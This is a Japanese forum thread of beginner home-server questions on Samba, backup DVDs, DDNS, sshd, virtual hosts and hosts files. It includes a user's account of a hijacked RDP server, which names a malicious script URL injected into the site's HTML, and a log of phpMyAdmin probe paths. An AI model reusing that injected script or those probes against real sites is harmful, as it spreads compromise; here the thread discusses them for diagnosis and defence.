くだらねぇ質問はここで@自宅鯖 47台目

自宅サーバ全般に関する質問スレッドです。
※注意：仕事で使うサーバーはスレ違いです。
特定のハードウェアに依存するものは、そのハードウェアスレでドゾ。

質問の際は
　1.OS名
　2.使用するサーバソフトとバージョン
　3.ネットワーク環境
などのサーバー環境を書きましょう。

まとめページ　ttp://www.wikihouse.com/faqhserver/index.php?FrontPage

前スレ
くだらねぇ質問はここで@自宅鯖 46台目
http://engawa.2ch.net/test/read.cgi/mysv/1315701274/

定番の質問用テンプレ
　・外部からはﾋﾟｺｰﾝなのに内部からはｼｮﾎﾞｰﾝです
　ttp://www.wikihouse.com/faqhserver/index.php?%B3%B0%C9%F4%A4%AB%A4%E9%A4%CF%8E%CB%8E%DF%8E%BA%8E%B0%8E%DD%A4%CA%A4%CE%A4%CB%C6%E2%C9%F4%A4%AB%A4%E9%A4%CF%8E%BC%8E%AE%8E%CE%8E%DE%8E%B0%8E%DD%A4%C7%A4%B9

　・串を刺して外部から接続して確認する方法もあるが、外部から接続してヘッダやソースの取得、スクリーンショット画像を生成してくれるサイトがある。
　ttp://fula.jp/cgi-bin/head/
　ttp://fula.jp/cgi-bin/head2/

次スレは>>970辺りが立てやがれ

　　　　　_,,,
　　　 _/::o･ｧ
　　∈ﾐ;;∧,ﾉ∧ 　　　,,,,, 　　,,,,,
　　　　( ´･ω･)　,,,,(o･e･),(｡･e･),,　　　　　新スレです
　　 　 /ヽ○==(｡･e･)(｡･e･)(o･e･)　　　　　仲良くつかってね。
　　　 /　　||＿彡,,, ﾉ彡,,, ﾉ彡,,, ﾉ
　　　 し'￣(_)）￣￣￣(_)）￣(_)）　　ｶﾞﾗｶﾞﾗ

a

windowsから異なるネットワークにあるsabmaへアクセスしたいのですがどうすればいいでしょうか

　　　　LAN
　　　　　|
　　　　ルータ
　　　　 |
　　|￣￣￣￣￣|
windows　　 ルータ
　　　　　　　　　　|
　　　　　　　　|￣￣￣￣￣￣|
　　　　　　　サーバー　　　Samba(linux)

図にするとこんな環境です（ズレてたらごめんなさい）
よろしくお願いします

すみません、アクセスというのはネットワークの共有のことです。
また、各ルータの管理権限はあります（portとかは開けられます）

>>4
「どうすれば」も何も、ポートが開いていればふつうにアクセス可能。
ただしネットワークブラウザでは見えないので、UNCパスを直接入力する必要がある。

centos6　でmondo rescueでisoでバックアップは取れたんだけど
それをDVD-RWに焼いて、
パソコンの電源を入れて、F12押してCD起動を選択したんだけど
全くのスルー・・・

これってやり方間違ってますか？？？

検索して調べると、その時点でBOOT画面になって
コマンド入れたらリストアできるって書いてあるんだけど・・・

ブートに失敗してるんだろ
焼きミスかメディアが非対応かhit any keyみたいなメッセージを見落としてるかじゃね？

>>6
ありがとうございます
さっそく試してみます

>>7
ディスクに書き込む時にBOOT可のモードや設定にしてないとか？

>>8
そのhit any key を押したら
英文の選択肢？？？　が出るけど
もしかしてここで何かするのでしょうか？

何か色々押してみたら
grub edit>
みたいのが出るんだけど・・・

＝＝＝

>>10
ディープバーナーで焼いたんだけど
それがイカンのかなぁ。
もう少し調べてみます。

>>11
まずは確実にboot出来るDVDを使って、ちゃんとブートするか試した方が良い

>>12
いつもCENTOS6で同じパソコンで再インストールできるって事は
その点は問題ないでしょうか？
またそのcentos6のDVDでライティング作業を行った時も
同じようにディープバーナーで・・・

やっぱりこのケースって中々みないトラブルでしょうか？
いくらやり方を検索しても見つかるのは
ＩＳＯイメージのヤツをＣＤ読み込みでセットしたら
ＢＯＯＴ：
が出てきて、そこでコマンドを打つ・・・

なぜ自分のだけ？？？と・・・
２週間以上彷徨ってる次第です。
エラーも出ずにスルーされてるので
正直手の打ち様が無い気分です。　(;´Д｀）

mondo rescueで必要としてるパッケージ？も

mkisofs
gzip ←これは圧縮だからオマケ？
afio
buffer
mindi-busybox
mindi
mondo

で、今日も>>8の件で気になって検索したら
mondo-doc
mindi-kernel

３回ほど実験したんだけどやっぱりスルー・・・

個人的に成功した事ないんだけど
ブログで書いてる人のを読むと
centos5でやってた人も6でやってもすんなり成功するとか・・・
あぁーあ、なぜだろう・・・

ちなみに、centos6は
インストール時に、最低限の？？？
って事で
最低限のパッケージ？を入れてます。
（インストール手順を参考にしたサイトにしたがって・・・）

確か
ベース　→　ベース
デスクトップ　→　ｘwindows・デスクトップ・デスクトップのデバッグ＝略＝
開発　→　開発

もしかして、このパッケージの少なさが
実はＢＯＯＴできない原因なんでしょうか？

バックアップ時に作成したDVDは、ISOファイルを「ファイル」として焼いてるんじゃないかな。
ブートレコードを含む起動可能なDVDにはなっていないんじゃないかという希ガス。
そのDVDを他のPCとかでマウントしてみたら、どう見えるのか気になる。
ファイルがひとつだけ見えるとかなら、焼きミスだな。

>>15
確かにISO一つしかありません。
そもそも、
mondoarchiveのコマンドで吐き出した時から
それ一つしかないです。
初めてなので、そういうものだと思ってましたが違うのでしょうか？？

その時にやったコマンドは
mondoarchive -Oi -d /backup -E /backup -s 4000m

この時点でISOとBOOTに必要な何かも
同時に作成されると言う事でしょうか？？？
それとも、その時は一つで
焼く時点で、それも見える感じになるのでしょうか？

>>15
・・・！？

一応、CENTOS6の再インストールに使ってるDVD-Rがあるのですが
そこからBOOTできるヤツをコピーして
それと今回取り出したＩＳＯを組み合わせて
ライティングするのでしょうか？

だとしたら、ISO焼きについてはここで説明するよりもググるのが早い。

つーか、DVDがちゃんと焼けたかどうか確かめないのかよ・・・

>>19
確かにその通りなんだが、スレタイからして察してあげるべきです

だとしたら、くだ質は初心者スレじゃないって事も知っとくべきだな

そうだな、くだらない≠初心者　だな。
舞い上がってつまらないミスもあるさ

mondoarchiveコマンドの時点でＩＳＯ一つしかないのですが、
その時点ではＩＳＯ一つだけで、
ライティング時に色々出るって事ですか？

>>23
今要求されているのは、そのISOイメージを「そのまま」焼くこと。
おそらくあなたがやっているのは、そのISOイメージをファイルとして含む
ISOイメージを改めて新規作成した上でそれを焼いている。

用語や操作方法はライティングソフトによって違うと思うが、
とにかくISOイメージを「そのまま」焼く方法を調べてみてください。
複数のファイルを指定できて焼くモードと、
ISOイメージ1つだけしか指定できずに焼くモードがると思うよ。

>>23
お前、この板でそれはないだろ
お前はインストールCDを作ったことがないのかと
ttp://tech.hitsug.net/?DeepBurner%2Fiso%E3%83%95%E3%82%A1%E3%82%A4%E3%83%AB%E3%81%AE%E6%9B%B8%E3%81%8D%E8%BE%BC%E3%81%BF%E6%96%B9

>>24
一旦ライティングソフトでＩＳＯを保存して
それを焼いているんだけど、こういう事でしょ？
それを前から何回かやったんだけど、それでもできない・・・

で、直接（試しに何回か）焼いたのもやったけど、これもだめ。
一通りやれる焼き方は試したんだけど。

>>26
>一旦ライティングソフトでＩＳＯを保存して
>それを焼いているんだけど、こういう事でしょ？

この時点で何を言ってるのかわからない俺がいる

ｗｗｗｗｗ

>>26
「iso 書き込み ディープバーナー」で出てくるページをいくつか見て
それと同じことをやってるのか確認してみたら?

ちょっと変な質問なのですが・・・

よくtelnetなどで接続すると、流れている情報は素の状態であり、
それを読み取られて悪用される危険があるなどと聞きますが・・・
インターネットに流れているパケットを無差別に誰でもフィルタリングする方法などあるのでしょうか？

>>30
スニファ(って商標だっけか)って言いたかったのだろうか
いまはアナライザだっけ、まあ系のことかなあ
非暗号化状態のパケットなら普通に分析(盗み見)可能

「無差別にフィルタリング」ってのがちょっと意味分からんかったので
勝手に脳内補完しちゃったが違う意味ならすまぬ

>>31
ありがとうございます。
スニファって言うんですね、少し検索して調べてみました。
やっぱり何かソフトをインストールしたりされてイントラ上を流れるパケットを調べるという方法なのですね
インターネットで流れている誰かのやり取りなどを取得する方法があるのかと思いまして・・・

例えば、会社から自宅のパソコンへtelnetで繋げた場合・・・
会社のパソコンにもルータにも異常はなく誰も触れない状態で、
自宅のパソコンやルータにも異常なく誰にも触る事ができない場合、
流れるデータは素であってもISP以外は取得される事はないという事ですよね？

>>30
回線持ってる企業を忘れるなよ？
まあ、電話線ジャックしてまで傍受しようとする奴はまずいないと思うから
各地域ごとの基幹ルータとかでもしかしたら傍受される程度だろうな。

仮にDPIが解禁になると確実に傍受されるけどな。
現段階でも特定の通信プロトコルに対して規制かけるとかしてるから
何かしら傍受してるかもしれんが。

>>33
そのためのSSLだな。

>>33
ありがとうございます確信がもてました。
無線電波のようにインターネットを漂っている情報をキャッチするなんて怖いと思っていたのですが、
パケットが流れる道のどこかに仕掛けを付けないと傍受は無理って事ですね。

DPIについても少し調べてみました
・・・ってか、こんな仕組みを標準にするの・・・・？
無駄に危険を１つ増やしているだけでは・・・

知らない単語をいくつか教えてもらったので、もっといろいろ調べてみます。
ありがとうございました。

>>35
基本的にネットワークって物理的なものだからな
でも、仮に何か仕掛けてあっても気がつかないのも事実なんだよな

前にプロキシ公開した時に何人かのIDとパスワードがログに残ってたけど
抜かれた奴は悪用された結果が出るまで気がついてないんだろうなあ

今はその知り得たアカウント情報を悪用した段階で犯罪となる仕組みだが、
今後は知った時点で犯罪成立となるような法律の変更をうんぬんと
どこかが報じてなかったっけ?

不正アクセス行為の禁止等に関する法律にはそんなことは書いてないな
情報も見つからなかった

今後その方向に向けて法改正の準備が・・・だったかも

>>37
http://news.biglobe.ne.jp/domestic/0221/san_120221_2878261276.html

これ？
これはどちらかというと、フィッシングなどの手段で
パスワードを不正に窃取する行為を禁じるもの。

お名前.comでドメインをとったんですが、自宅サーバ（CentOS6, 64bit)のDiCEから更新できません。
イベントの設定はできたのですが、実行すると以下のエラーが出ます。

ホスト名空白 ドメイン名aaa.bbb
Error: 指定されたホスト名またはドメイン名は存在しません

ホスト名aaa ドメイン名bbb
Error: DiCE.レスポンスを認識出来ませんでした
と表示されます。

アドバイスください。
私が気になっているのは以下です。
・ポート６５００１を開ける必要はあるのか？
・お名前.comで現在ドメインに設定されているIPを知る方法
・お名前.comで手動でドメインのIPを更新する方法
・お名前.comのDDNSクライアントソフトはLinuxまたはWindows7で動かないのか？
・DiCEによる更新が成功したことを確認する方法

>>41
1. ないんじゃね？
2. ドメインnaviとやらにログインすればいいんじゃね？
3. 同上
4. 見たことないが動くんじゃね？
5. Diceの設定は http://b.n-at.me/archives/182 この辺参考にすれば？
確認するには、外部のDNSからnslookupすればいいんじゃね？
要するに、世界中どっからでも登録したアドレスが引けるかどうかが問題なんで、ググってnslookup か dig をサービスしているページで確認。

追記: http://www.cman.jp/network/support/nslookup.html
当然ながら、変更に成功してもタイムラグがあるから気をつけて。
Diceでできないわけではなさそうなので、適宜ググって頑張れ。

sshdのログに
fatal: buffer_consume_end: trying to get more bytes than in buffer
というものが吐かれているんですが、
エラーログ名を検索しても解決に至るような
対処方法が発見できません。

エラー発生のタイミングをログで見ると、
鍵認証でログインするときに出ているようでしたので、
秘密鍵、公開鍵を新たに作り直してみても同様のエラーが出ます。
ipteblesを設定していない状態でログインしても同様のエラーが出ます。
対処方法、確認すべき箇所とかについてアドバイスください。

根本的な解決策の定時ではありません。
いくつかとりようがあるので、並列に書きます。

致命： バッファ消費しきったよ： バッファにもっとバイトぶち込もうとしていますよ。
致命的： バッファ消費の終わり： バッファをもっと確保しようとしています。

参考になりますかね?
by 門外漢

>>44
そのメッセージでググってみた? いくつか解決辞令がヒットするけど。

スレチなんだけど、ぼくおじゃまさせてもらいます　m(_ _)m

今、ぼく行方不明中なんです・・・

ぼくのことを心配している人たちも頑張っているのだけど、
もっと、もっと、沢山のひとにしってもらわないと見つからないんだって・・・

ぼくの動画もあるんだよ・・ttp://youtu.be/IERsFdY104E


ぼくのチラシもつくってもらったんだ
　　　　　アトムチラシ0226_2
　　　　　ttp://www1.axfc.net/uploader/Img/so/136842
　　　　　PW[ atom ]

ぼくのことを検索してほしい・・みつけてほしい・・おねがいします・・・

　　　　　　　　　　　　　行方不明中の九州盲導犬協会所属　盲導犬アトムより

※「盲導犬とのよりよい暮らしを考える会のブログ」　で、署名活動をしています。
　　ご協力の程、宜しくお願い申し上げます。
　　　
ttp://ameblo.jp/moudouken-yoriyoi-kurasi/entry-11164892346.html

>>43
できた！
どうやら、お名前.comのほうの「レンタルＤＮＳレコード設定」
で設定対象のドメイン（ホスト）を予め登録しておく必要があるみたいだった

リモートデスクトップで鯖いじろうとしたらつながらないので
鯖のモニターの電源入れてみたら･･･

どうやら中華圏の輩にのっ取られてたらしい
中国語のサイトが開いてあったり
中国語版のリモートデスクトップっぽい物が起動した状態だった
何かをダウンロードしてる途中で運良くNICがバグったらしい
さてどうしたものか…

そういうレスは雑談スレヘドゾ。

「どうすればいい？」という質問だからいいんじゃない

まずはLANケーブルひっこぬく。中身見て満足したらOS再インスコ。
もちろん中身見た際に再発防止も考えるように。

というかリモートデスクトップなんか外に向けて開けてる時点で(以下略)

どういうアタックされて乗り込まれたのかを調べておかないとね。
ログが残ってるかどうかも怪しいとは思うが。
おそらくは、外部から操作するために穴あけて、それ受けてたPCが乗っ取られたのかな。
>>49は今後の対策としてファイアウォール機能を充実させることになるのか。
固定IPで運営しているんなら、そういう連中にIP横流しされてるかもしれないから注意だな

>>46
どうもです。ggてみます。

別の質問なんですが、hddがクラッシュした場合に備えフルバックファイルを定期的にとっています。

万が一hddがクラッシュして、フルバックファイルをリストアする場合、同じバージョンのOSを再インストールして、リストアする方法しかないのでしょうか。新たに同じosをインストールした場合、どのタイミングでリストアのコマンドを打ち込むのでしょうか。

スレ違いだったみたいどす。すみません。
別板で覗いてきます。

>>53
スキャンしたらWin32:Qmgr-B.Win32:Salityが大量に出てきました
それとDLされたと思われる「MSTSC可直接？制？程文件.EXE」
が入った圧縮ファイル「3389_？_？？(壜？？_？_？？審).rar」が出てきました
鯖内のおそらくすべてのHTMLの最後の行に
スクリプトttp://web.nba1001.net:8888/tj/tongji.jsが付いてます
固定IPでは有りませんが1年近く変ってません…
あとavastが消されてました
当時の状況はこんな感じ
ttp://www.dotup.org/uploda/www.dotup.org2708788.png

>>52
リモートデスクトップは外には向けていませんでした
UPnPで中から開けられた?

ファイル共有にでも使われてたのか
興味あるからどっから侵入されたかわかったら是非教えてくれ

あ〜あ。やられてるね。
ttp://www.google.co.jp/search?q=ttp%3A%2F%2Fweb.nba1001.net%3A8888%2Ftj%2Ftongji.js

Windows XPかな？

だとしたら、0-day flaw (つまり攻撃方法が公開された時点で修正の存在していない
セキュリティホール) がたくさんあったし、デバイスドライバ類に付属するツールに
穴があったりすることも数多くあるので、そこらへんかな。

ルータの内側に入って来られたってこと？
かなりやばいんじゃないの

侵入経路はどうなってんだろね。
自分から変なことしなければNAT機器の内側まで
そうそう入られないような気がするけど・・

意図的に公開してないのにリモートデスクトップを乗っ取られたってことは、
LAN側から侵入された可能性もあるな。無線LANとかウイルスとか。

>>60
幼稚園で習いませんでした？
怒られたら謝るって
どっちが悪いだの悪くないだの、そんな屁理屈よりも
まずは相手を怒らせてしまった、そのことに対して
最初に謝るべきじゃないんですか？

バックドアでも置かれて、あとはホイホイだろうな

ハカーにはハカーで対抗せよ

>>61
たった1回バックドア仕込むウイルスか何かに引っかかれれば、
こういうことになる。被害が広がる前に、とりあえずサーバ停止
させて、関係官庁に届出が必要かどうか調べるべき。
総務省とIPAを調べてみよう。

鼻毛鯖にLinux Mint 12(Debian)を載せて下記のような接続で鯖公開してます
外---[ルータ]---[PC]

そこで質問なのですが、サブドメインごとにポートを変換して接続させることはできますでしょうか？
具体的には、
aaa.hoge.com で接続してきたものを 192.168.0.2のポートyyへ
bbb.hoge.com で接続してきたものを 192.168.0.2のポートzzへ
それぞれ接続させるようにしたいです

同種のゲーム鯖を一つのPCで複数立てており、現状はポートを指定して接続してもらっているのですが、
できればポート番号を隠してサブドメインで振り分けるようにしたいです
よろしくお願いします

>61
警視庁のページにあったぞ。
http://www.keishicho.metro.tokyo.jp/haiteku/haiteku/haiteku34.htm

>>67
サブドメイン毎に対外グローバルIPアドレスが異なっているか、
(ゲーム鯖ってのがHTTPベースで通信すると仮定して)
ルータにHTTPプロキシの機能があるか、なら可能。
IPアドレス1つで、ルータがただのNATしかしてくれないなら無理。

>>67
それはバーチャルホストか？
だとしたら普通のルータで考える事じゃないな。

>>67
ロードバランサ

>>71
Apacheで言うところのNameVirtualHostで解決するのが一番楽だと思うが。
IISは知らないので何とも言えない。

携帯のメールアドレスに送ったら送れない場合があります。
調べるとメールアドレスの形式がRFC違反だから送れないようですが、
これらのRFC違反のメールアドレスとも送受信可能なメールサーバはありますか？

乗っ取られた原因はルーターの設定が間違っていて
ポートがフルオープンになっていたからのようですorz
17時15分から37分間、1〜2秒に1回ペースでログオン失敗のログが…

>>74
ポートがフルオープンになってただけでは、乗っ取られないだろう。

管理者のパスワードが安易なものになってたとか、パスワード無しで管理者権限を
得られる方法があったとか、既知の脆弱性を放置してたとか、もう1つの理由が
あるはず。

>>75
お察しの通り安易なパスワード&IDでした
アップデートは自動でしてました
ほぼ同じ設定で10年近く鯖立ててましたが今回のようなことは初めてでした
1年ほど前に光回線に変更してONU+ル−タに換えるまで何事も無かったのは
ルーターのお陰だったようですね
設定の問題点は静的NATエントリに鯖アドレスを入れていたことでした

ある意味自業自得ではあるんだが
踏み台にされたら他の人にも迷惑かけるからなあ

そのポートも乗っ取られたあと全開にされたのかもね
最初の入り口を特定するのはさすがに難しいか

>78
そんなもの、nmap使えば簡単に見つけられる。

ところで>48は>68のリンク先は読んだのかな？せめて罪滅ぼしに
ちゃんと警察に届けとけよ。

> 最初の入り口を特定するのはさすがに難しいか
> そんなもの、nmap使えば簡単に見つけられる。
nmapってそういうツールでしたっけ・・・

nmapはそういうツールだろ。

自分の認識じゃどこが最初かなんてわかるようなツールじゃないな。
どういう使い方をすればどこが最初かを見つけられるのか教えてくれないか？

犯人側目線で
最初の入り口はnmap使えば簡単に見つけられるってことじゃないか？

被害者からはどっから入られたか分からないと思う
まぁポート全開だったならどっからでもかかって来い状態だし
直接3389から来たんじゃないかな

>>76で被害者が
＞設定の問題点は静的NATエントリに鯖アドレスを入れていたことでした
って言ってるから最初からRDPのポート開放と鯖へのNAT設定をしていたのかもね。
やっぱその手のサービスを直接外に晒しちゃ危険すぐる。

>>83
>犯人側目線で
>最初の入り口はnmap使えば簡単に見つけられるってことじゃないか？
なるほどサンクス。そのはっそうはなかった・・・
(どう考えても被害者目線の話だったので)

>>83
nmap使うと最初から開いていたポートと侵入された後に開けられたポートが区別できるのか？

>>86
侵入口を見つける取っ掛かりとしてポートスキャンするのは常套手段って話

明確な意思を持ってどこかのホストに侵入するならポートスキャンもするだろうけど、
今どきの「踏み台にできるならどこでもいい」という攻撃ならそんなことはしない。
既知の脆弱性をいきなり狙って成功したら侵入、失敗したら別のターゲットを探す。それだけ。

>>87
>>78-79の流れについて言ってるんだが

>>89
>83と>85と>87
二番煎じのネタは勘弁しろよ

>>90
ん？>>79には触れるなってこと？

もう>>83で分からなかったら宿題って事にしとけ

まあ、RDPなんて最初に攻撃されるようなサービスだしな
win鯖じゃないがFWがちゃんと設定できてるかもう一度見直すか
安定稼動しだすと放置しやすいけど、定期的に侵入痕がないか調べないとな

ちょっとスレ違いかもしれませんが、お願いします。

自宅鯖がどの様に見えるか、PCからの場合、
hostsにローカルIP、サーバ名を書いて見ています。


スマフォでどのように見えるか、スマフォを持っていないので、
Androidスマートフォンエミュレータで見たいと思います。
http://developer.android.com/sdk/index.html

では、当たり前なんですが、ホスト名を入れると
・外部からはﾋﾟｺｰﾝなのに内部からはｼｮﾎﾞｰﾝです
なんです。

皆様、スマフォ対応のページの表示確認はどうしてます？
Androidスマートフォンエミュレータでhostsが書ければいいのですが。。。

ローカルIPでアクセスすれば良いんじゃない?
絶対URLで書いてあるとかなら公開プロクシ経由とか

>>94
回答ありがとうございます。

・ローカルIP直でアクセスできない理由があります。
・公開プロキシでも考えましたが、試していません。

で、自己解決しました。
解決方法は次レスで。

C:\Program Files\Android\android-sdk\platform-tools>adb shell
# su
su
# mount -o rw,remount /dev/block/mtdblock3 /system
mount -o rw,remount /dev/block/mtdblock3 /system
# exit
exit
# exit
exit

C:\Program Files\Android\android-sdk\platform-tools>adb pull /system/etc/hosts .

0 KB/s (25 bytes in 0.140s)


※ここでhostsに追記


C:\Program Files\Android\android-sdk\platform-tools>adb push .\hosts /system/etc

0 KB/s (56 bytes in 0.078s)

C:\Program Files\Android\android-sdk\platform-tools>


てな感じで出来ました。
私のサイトはスマフォでは正しく表示できないことが分かりました。。。

そんな事せんでも、DNS立ち上げればよかったんじゃ。
色々はかどるのに。

まあ、がんばったんだなあと思うけど
内向きDNS使えば済む話ではあるよな
むしろ「su -」を使ってない部分に興味がわいたが

環境変数引きずりたい時位だよな。

WAN側IPアドレスがa.b.c.d、サーバーのLAN側IPアドレスがe.f.g.hだとした時に、
LAN内の機器からはhttp://e.f.g.h/でアクセスできるのですが、
LAN外からは当然http://e.f.g.h/ではアクセスできません。http://a.b.c.d/でもアクセスできませんでした。
どのようにすればLAN外からアクセスできるのでしょうか。初歩的な質問かもしれませんがお願いします。

教えてください。
現在Bフレッツ光を引いています。
自宅サーバーを建てたいと思っています。

やりたいことは、
・WEB公開
・メールサーバー
・DNSサーバー
です。

ASAHIネットかInterlinkで固定IPサービスを申し込もうと思うのですが、
上記サービスを行う上で取得する固定IPの数は最低1個で実現できるものなのでしょうか?

よろしくお願いします。

>>100
静的IPマスカレード

>>102
静的IPマスカレードが使えない場合は技術的に不可能でしょうか。

>>103
んー
DMZで出来るかな

>>101
グローバルIPは1個でできる。
更に言えば、固定IPが無くてもできる。

>>104
DMZも使えないです＿|￣|○
何せルータがiPhoneなんで・・・
諦めた方が良さそうですかね。

>>106
外からのアクセスを中に中継する何らかの機能がないとダメでしょう。
テザリングのソフトだと中→外に重点が置かれてるだろうから
外→中の機能ってあまりないかもね。

iPhoneで動作するプロキシサーバとかApache httpdとかあると
それで中継できそうだけど、そんなものがあるとも思えない。

>>106
iPhoneはIPv6使えるから
サーバーにIPv6のグローバルアドレスを割り当てれば
LAN外からでもアクセスできるはず

>>107
Jailbreak済みなのでlighttpdなら使えそうなのですが・・・

>>108
ipv6だとルーター(iPhone)のIPアドレスから分からないんですよね・・・
MACアドレスといったものから作れば良いのでしょうか

sslのアクセスログについての質問です
FirewallでSSHと80番のポート以外はブロックしているはずなのですが
SSLのアクセスログがサーバに残っていて、存在しないファイルにアクセスしようとしたものでした。（ちょっと焦っています。。）
Firewallの設定ミス意外に考えられる原因があるようでしたら、是非ご教授下さい
宜しくお願い致します

>>110
SSLって具体的に何のアプリケーションプロトコル？
https? smtps? pop3s?

>>110
誰のリクエストか確認して、ほかのログ見てみた方が早いんじゃね？
あとsshは転送も出来るが大丈夫？

>>110
勘ですけど、通常443番のHTTPSを80か8080辺りで通す様になってそうな。

SSLは単独のウェルノンポートがないので、(何かのプロトコル)over SSLに
なってる気が…。

>>110
mod_proxyがオープンに動いてるとか
ssh port forwarding でアクセスされてるとか

>>109
「lighttpd proxy」でググるとプロキシ機能がありそうなので、調べてみたら?

>>115
mod_proxyという機能があるそうです。明日試してみます。ありがとうございました。

安い鯖借りるか自宅鯖にするか悩んでいます。
検討中なのはこんなかんじです。
自宅の場合
　回線はau光の1Gbps契約（動画観たりしないからリソース勿体無い）
　Dell mini9（CPUはAtom N270、メモリは2GBに増設済み）
借りる場合
　HostGatorとかエロもイケる海外の安いホスティング鯖

（備考）重視している点は、
・レン鯖の安いプラン同等以上のパフォーマンス
・ワンコインくらいでの安い運用（電気代が安いかレン鯖が安いか）
・エロサイトでもなんでも法に触れなきゃ制約なしが理想

何のパフォーマンスを求めるかで異なるから何も回答できない。
レン鯖なら鯖本体の様々な運用コストはレン鯖代で業者に丸投げ出来るが、
代わりに容量や使途等に運用に制限がつく。
自分で鯖建てれば使途の制限は減るけど代わりに鯖の運用コストがかかる。
トラブル解決、冗長化、運用リスクその他全部抱えることになる。

その上で考えないと答えにくい。

純粋に毎月の平均コストしか見ないなら鯖借りとけ。
宅鯖はリプレースイベントが高確率で避けて通れないから。

助言ありが�d。
やろうと思ってるのは個人的なエロ動画紹介ブログ（動画リソースは他社サイト）くらいのもので、
業務利用するわけでもないのでプロユースでは重要な可用性信頼性は重視しなくてもよく、
それなりの管理コスト（ほぼ放置）で運用していこうと思っています。
（たぶん固定IP契約とかじゃないと思いますが2年以上IPアドレスが変わったこともないので・・・）
レンタルの低価格プランだと運営にしばらくリソース停止させられる程度の負荷でも、
WordPressや広告画像がある程度快適にレスポンスできるパフォーマンスがでればいいと思っています。

自鯖で散々実験して、運用はレンタルってのが俺的な結論

一見電気代が無駄そうに見えて意外とエコだけど何か質問ある？
http://up2.iyhoo.net/up/download/1332673363.jpg

@niftyで自宅鯖ってヤバイ？
上りの転送量の制限的に

うちの回線だと上り下り共に実測値で50Mbpsくらいなんだけど画像投稿サイトは厳しいかな？

1hit/day→問題ない
1000hit/Hour→重い

結論：好きにしたら？

>>120
そんな知識でほぼ放置するならレンタル鯖借りてくれ。

サーバってhttp://www.mouse-jp.co.jp/business/mpro-sv/みたいな専用のましんのほうがいいですか？
家電で撃ってるPCはやめるべきですか？

>>127
使い方と求める品質次第。

たとえばクラウドを構築したりhadoopの勉強する場合は？

>>127=129 & 複数台サーバ用意して何かやりたい、ってことでいいのかい?
勉強するだけなら安価なPC複数台用意すれば済むだろうし、
極端な話1台のPCに複数の仮想マシン用意すれば実験はできるよ。

メーカのサーバ機は、24/365保守サポートの契約しないなら嬉しさ半減かと思う。

↓の家サーバにログがあったんですがアタックですか？

Requests with error response codes
401 Unauthorized
//admin/index.php: 1 Time(s)
//admin/phpmyadmin/index.php: 1 Time(s)
//admin/pma/index.php: 1 Time(s)
//db/index.php: 1 Time(s)
//dbadmin/index.php: 1 Time(s)
//index.php: 1 Time(s)
//myadmin/index.php: 1 Time(s)
//mysql/index.php: 1 Time(s)
//mysqladmin/index.php: 1 Time(s)
//php-my-admin/index.php: 2 Time(s)

>>131
非常によくあるアタックだけど401なら問題ないっしょ。
該当コンテンツを設置してないならなおさら。

phpmyadminさんの人気は流石だわ

俺は5回以上401を踏んだら、.htaccessにdeny書くスクリプトを401のErrorDocumentに書いてるわ。
ただ、auのスマホにしてから、こいつのブラウザがかなりの回数無駄に401踏むのでイライラしてる。
解除は特定urlのスクリプトに、明日の日付をエンコードしたのを投げる。

レス有難うございます。

簡単ですがルートからBasic認証してるのでそれも効果があったようですね。

俺は、そういう奴には、

HTTPのステータスコード418を返して
eicarを送りつけてるｗ

>>136
"I'm a teapot"ってちゃんと返してるかい？

>>137
うん。

header("HTTP/1.1 418 I'm a teapot");

１台のマシンに複数のOSを入れる技術があるけど
逆に複数台のマシンで１つのOSを動かす技術はあるんですか？
それが出来たらどんどんノード追加するだけでソフトの変更無しで性能UPできますよね

>>139
無い、メリットも無い、性能アップも出来ない
グリッドコンピューティングでもしてろ

>>139
それなんてスーパーコンピュータ／クラスタ？

う〜ん、詳しくは知らないけど、
確か外付けのHDDにOSをインストールして、
そのOSを複数台のパソコンで立ち上げるみたいなのがあった気がする・・・
まぁレスポンスやらセキュリティやらで問題ありそうだけど。

>>142
ディスクレスのワークステーションってのが昔あったよ。
使ったことがあるSunのだとNFS使ってシステム部分は共有、
どのマシンからログインしても自分のホームディレクトリがある、って感じ。
でもこれは高価だったHDDを共有して安くあげたり、
たくさんのワークステーションの管理を一極集中させるためのもので、
それぞれは単体のUNIXワークステーションとしてしか動作しない。

>>139の要望に近いものだと、分散コンピューティングとか?
OSの他にミドルウェアとか開発環境とか一式揃えてなんぼの世界かと。
上記のSunのシステムで分散コンピューティングの研究やってた人もいたな。

普通にクラスタの事だろ
自鯖で必要かは知らんが

>144
性能的には必要ないが、学習のために運用したい香具師はいるだろう。

CentOSのホストネームってドメイン何も取得してないときって何を入力すればいいのでしょうか？

自分の座右の銘を入力

>>147
柿食えば鐘がなるなり法隆寺っていれと来ました

誘導されてきました。
本日アクセスログにこんなのがありました。
4分半間隔で２５０回のアクセスがありました。
2012/04/02 00:34:34　NOMAL　2828　SmtpServer　65.54.190.140　0000001
接続しました　EHLO bay0-omc3-s2.bay0.hotmail.com from bay0-omc3-s2.bay0.hotmail.com[65.54.190.140]
これは、不正アクセスでしょうか。不安です。よろしくお願いいたします。

自鯖がブラックリストに載ってないか確認。

>>149
送信元はおそらくhotmailの正規のメールサーバ。
EHLOの後にどういう通信があったか分からないと何とも言えないが、
ゲスパーすると被害は最大でも、
あなたが管理しているドメイン宛にspamが送信された程度。

お二方ありがとうございます。
正規サーバーと分かり安心しました。
今調べたら昨日も、50件くらいきていました。
もう少し様子を見てみます。
ただひとつ、分かったのは私のドメイン宛にメールを送ったが、エラーメールが返信されたという方が一人いました。
これと関係しているのでしょうか。調査してみます。
でも、不正アクセスでないと分かり安心です。ありがとうございました。

465番portがsoftbankのpocket wifiからアクセスできない
それともほとんどのプロパイダは25だけじゃなくて465も塞いでるの？

カレンダー情報(iCal)を自宅鯖からパスワードつきで共有する方法ないでしょ
うか
iphonelとも共有したいです

>>153
ちなみに職場から自宅のpostfix dovecotサーバにはつながります

逮捕あるだろこれ　2ch削除人幹部十数名が報酬を受け取っていることが判明
http://engawa.2ch.net/test/read.cgi/news/1333664054/

>>156
シスオペも金もらってたしな。結局。

アクセス解析とかの接続確認をしたい時って、みなさんどうしてます？
ローカルで検証するにはhttp://127.0.0.1/でやらないと繋がらないんだよね・・・
同一LAN内からでもhttp://XXX.ddo.jp/とかでアクセスできませんかね？

>>158
内向きDNS
あとexample.com

ddo.jpの無料のサービスでDDNSしていたのですが、もう一個ddoでDNSを取っていたのを
今度から常駐させようとして、バーチャルホストにして一緒のマシンのApacheに
移そうとしたところ、ddoは無料で同一IPで複数ドメイン名は使えないという事をはじめて知りました。

片方を有料にすればいいのかと思ったのですが、ddo.jpを使うなら両方有料にしないと
いけないようで、なら新しい方はいっそ別のところで無料のサービスを探そうと思ったのですが、
